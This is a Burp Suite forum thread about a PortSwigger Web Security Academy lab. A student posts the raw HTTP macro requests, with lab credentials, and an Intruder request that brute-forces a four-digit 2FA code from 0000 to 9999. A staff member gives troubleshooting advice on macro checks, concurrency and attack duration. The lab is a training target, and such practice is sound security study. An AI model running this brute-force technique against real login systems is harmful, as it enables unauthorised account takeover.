Burp Suite User Forum


Lab: 2FA bypass using a brute-force attack doesn't get me a 302

Student921 | Last updated: Jul 04, 2022 09:17PM UTC

Hi, when I do the brute-forcing attack via macro + Intruder, I always receive Code 200 responses, but no 302. Macro is built like this:

(1)
GET /login HTTP/1.1
Host: 0a0a008203516d83c09d776400b40024.web-security-academy.net
Cookie: session=ru5TQKAWEBXuPQ2K0AVDrrYZOD6uwa8X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://0a0a008203516d83c09d776400b40024.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

(2)
POST /login HTTP/1.1
Host: 0a0a008203516d83c09d776400b40024.web-security-academy.net
Cookie: session=ru5TQKAWEBXuPQ2K0AVDrrYZOD6uwa8X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: https://0a0a008203516d83c09d776400b40024.web-security-academy.net
Referer: https://0a0a008203516d83c09d776400b40024.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

csrf=aSabNJI55k2rKw87IxcAIqw1YGK1aKeC&username=carlos&password=montoya

(3)
GET /login2 HTTP/1.1
Host: 0a0a008203516d83c09d776400b40024.web-security-academy.net
Cookie: session=UFiW2Evz4AzFbNLRtSY5E4kVZO3e8eCW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://0a0a008203516d83c09d776400b40024.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Following Intruder request:

POST /login2 HTTP/1.1
Host: 0a0a008203516d83c09d776400b40024.web-security-academy.net
Cookie: session=bBw94J7y58PIvJ2MkQinolOt1ELI8bsN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://0a0a008203516d83c09d776400b40024.web-security-academy.net
Referer: https://0a0a008203516d83c09d776400b40024.web-security-academy.net/login2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

csrf=USAUKTr2RAVWNFwDwrWNkCycDI9RzYJR&mfa-code=§x§

Where x is any combination from 0000 to 9999.

Ben, PortSwigger Agent | Last updated: Jul 05, 2022 07:52AM UTC

Hi Dejan,

I have just run through this lab and was able to solve it using the solution provided, so it does appear to be working as expected. A few things to check:

- Have you tested the macro just to make sure that you are landing on the page where you enter the security code (the solution mentions this so I assume you have, but just to be sure)?
- Have you configured your resource pool settings so that you are only sending a maximum of one concurrent request during the Intruder attack?
- How long do you leave the attack running for? (I believe that we have configured the solution to always be at the lower end of the possible number range but, as an example, I did not hit the correct security code until the 1428th request had been sent, so I just want to confirm that you are leaving the attack running for a suitable length of time.)
